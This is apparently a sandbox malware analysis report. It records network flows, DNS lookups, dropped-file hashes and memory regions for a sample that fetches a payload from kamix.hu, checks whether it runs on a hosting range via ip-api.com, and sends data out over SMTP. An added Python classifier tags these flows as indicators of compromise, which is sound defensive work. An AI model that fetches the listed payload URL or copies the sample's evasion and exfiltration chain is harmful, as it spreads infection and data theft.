    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    tls, http2
    2.5kB
    9.0kB
    20
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204
  • 2.17.107.105:443
    https://www.bing.com/aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    tls, http2
    1.5kB
    5.4kB
    17
    12

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

    HTTP Response

    200
  • 2.17.107.105:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.7kB
    6.4kB
    18
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 37.17.172.136:443
    kamix.hu
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    190 B
    92 B
    4
    2
  • 37.17.172.136:443
    https://kamix.hu/255_Jraenquhwco
    tls, http
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    21.3kB
    834.6kB
    423
    604

    HTTP Request

    GET https://kamix.hu/255_Jraenquhwco

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    huqnearJ.pif
    310 B
    347 B
    5
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 134.119.18.23:587
    sslout.de
    huqnearJ.pif
    260 B
    5
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    72.6kB
    2.1MB
    1537
    1534

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    17.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    105.107.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    105.107.17.2.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    kamix.hu
    dns
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    54 B
    70 B
    1
    1

    DNS Request

    kamix.hu

    DNS Response

    37.17.172.136

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    136.172.17.37.in-addr.arpa
    dns
    72 B
    110 B
    1
    1

    DNS Request

    136.172.17.37.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    huqnearJ.pif
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    sslout.de
    dns
    huqnearJ.pif
    55 B
    71 B
    1
    1

    DNS Request

    sslout.de

    DNS Response

    134.119.18.23

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    35.15.31.184.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    35.15.31.184.in-addr.arpa

  • 8.8.8.8:53
    79.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    79.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa
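
Most of the Network section is the Windows 10 image talking to Bing, Edge and Akamai on its own (the WindowsShellClient user-agent, the Spotlight image fetches, the sandbox's reverse lookups), and only three flows are attributed to the sample: the kamix.hu download with the WinHttpRequest user-agent, the ip-api.com "hosting" check from huqnearJ.pif, and the same process opening port 587 on sslout.de. The following is an added example, not tria.ge code: it classifies constructed flow records modelled on this report, separates background noise from sample-attributed traffic, and tags the three behaviours a responder would extract as IOCs. The flow schema is invented; the background-host list is an assumption about what a stock image contacts; the 6-byte text/plain body ip-api.com returned is consistent with "false" plus a trailing newline, but the body itself is not shown in the report, so the parser below is illustrative.

```python
"""Separate OS background traffic from sample-attributed flows and tag the suspicious ones.

Added example, not tria.ge code. Flow dicts are constructed to mirror the
Network section of this report; the field names are invented.
"""
import re

# Hosts a stock Windows 10 image contacts on its own (Spotlight/Start tiles via Bing,
# Edge/Akamai CDN). Assumed list; extend it per sandbox image.
BACKGROUND_HOSTS = re.compile(r"(\.|^)(bing\.com|bing\.net|a-msedge\.net|akamaitechnologies\.com)$", re.I)
# Default user-agent of the WinHTTP COM object (WinHttp.WinHttpRequest.5.x): script-driven HTTP.
SCRIPT_UA = re.compile(r"WinHttp\.WinHttpRequest\.\d", re.I)
SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # processes for which SMTP is expected


def classify_flow(flow):
    """Tag one flow. Keys: host, port, proto, process (None if unattributed), ua, url, rx_bytes."""
    host = flow["host"]
    if host.endswith(".in-addr.arpa"):
        return ["ptr_lookup_noise"]              # sandbox reverse lookups, not sample behaviour
    if not flow.get("process"):
        return ["background"] if BACKGROUND_HOSTS.search(host) else ["unattributed"]
    tags = ["sample_attributed"]
    if flow.get("ua") and SCRIPT_UA.search(flow["ua"]):
        tags.append("script_user_agent")
    if host == "ip-api.com" and "fields=hosting" in (flow.get("url") or ""):
        tags.append("hosting_check")            # asks only whether the egress IP is a hosting range
    if flow["port"] in SMTP_PORTS and flow["process"].lower() not in MAIL_CLIENTS:
        tags.append("smtp_from_non_mail_client")
    if flow.get("rx_bytes", 0) >= 100_000 and flow["proto"].startswith("http"):
        tags.append("large_download")
    return tags


def hosting_check_result(body):
    """Parse ip-api's /line/?fields=hosting body ('true' or 'false' plus newline) into a bool."""
    return body.strip().lower() == "true"


def ioc_table(flows):
    """Collapse attributed flows into (process, host, port) -> sorted tags."""
    table = {}
    for f in flows:
        tags = classify_flow(f)
        if "sample_attributed" in tags:
            key = (f["process"], f["host"], f["port"])
            table.setdefault(key, set()).update(t for t in tags if t != "sample_attributed")
    return {k: sorted(v) for k, v in table.items()}


SAMPLE = "22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe"
# Constructed flows modelled on the report; byte counts are the report's rounded totals.
SAMPLE_FLOWS = [
    {"host": "g.bing.com", "port": 443, "proto": "http2", "process": None,
     "ua": "WindowsShellClient/9.0.40929.0 (Windows)", "url": "https://g.bing.com/neg/0", "rx_bytes": 9_000},
    {"host": "237.197.79.204.in-addr.arpa", "port": 53, "proto": "dns", "process": None},
    {"host": "kamix.hu", "port": 443, "proto": "http", "process": SAMPLE,
     "ua": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
     "url": "https://kamix.hu/255_Jraenquhwco", "rx_bytes": 834_600},
    {"host": "ip-api.com", "port": 80, "proto": "http", "process": "huqnearJ.pif",
     "url": "http://ip-api.com/line/?fields=hosting", "rx_bytes": 347},
    {"host": "sslout.de", "port": 587, "proto": "tcp", "process": "huqnearJ.pif", "rx_bytes": 0},
]

if __name__ == "__main__":
    for key, tags in ioc_table(SAMPLE_FLOWS).items():
        print(key, tags)
```

Run stand-alone it prints three IOC rows, one per attributed (process, host, port) pair. The process attribution is what makes the port 587 flow actionable: an SMTP submission from a .pif in Public\Libraries is exfiltration regardless of whether the relay itself is legitimate, and an egress rule that only permits mail clients to reach 25/465/587 would have blocked it.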

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Public\Libraries\huqnearJ.pif

    Filesize

    66KB

    MD5

    c116d3604ceafe7057d77ff27552c215

    SHA1

    452b14432fb5758b46f2897aeccd89f7c82a727d

    SHA256

    7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

    SHA512

    9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

  • memory/2356-0-0x0000000000790000-0x0000000000791000-memory.dmp

    Filesize

    4KB

  • memory/2356-1-0x0000000000400000-0x00000000005B9000-memory.dmp

    Filesize

    1.7MB

  • memory/4068-4-0x0000000000400000-0x0000000001400000-memory.dmp

    Filesize

    16.0MB

  • memory/4068-7-0x0000000000400000-0x0000000001400000-memory.dmp

    Filesize

    16.0MB

  • memory/4068-9-0x00000000752DE000-0x00000000752DF000-memory.dmp

    Filesize

    4KB

  • memory/4068-10-0x0000000049C10000-0x0000000049C6C000-memory.dmp

    Filesize

    368KB

  • memory/4068-11-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-12-0x000000004C170000-0x000000004C714000-memory.dmp

    Filesize

    5.6MB

  • memory/4068-13-0x000000004C760000-0x000000004C7BA000-memory.dmp

    Filesize

    360KB

  • memory/4068-14-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-15-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-20-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-54-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-74-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-72-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-70-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-68-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-64-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-62-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-60-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-58-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-52-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-48-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-46-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-44-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-42-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-38-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-36-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-34-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-32-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-30-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-28-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-26-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-24-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-66-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-22-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-56-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-50-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-18-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-40-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-16-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-1101-0x000000004C8C0000-0x000000004C926000-memory.dmp

    Filesize

    408KB

  • memory/4068-1102-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-1103-0x000000004D7B0000-0x000000004D800000-memory.dmp

    Filesize

    320KB

  • memory/4068-1104-0x000000004D800000-0x000000004D89C000-memory.dmp

    Filesize

    624KB

  • memory/4068-1106-0x00000000752DE000-0x00000000752DF000-memory.dmp

    Filesize

    4KB

  • memory/4068-1107-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-1109-0x000000004D920000-0x000000004D9B2000-memory.dmp

    Filesize

    584KB

  • memory/4068-1110-0x000000004DA40000-0x000000004DA4A000-memory.dmp

    Filesize

    40KB
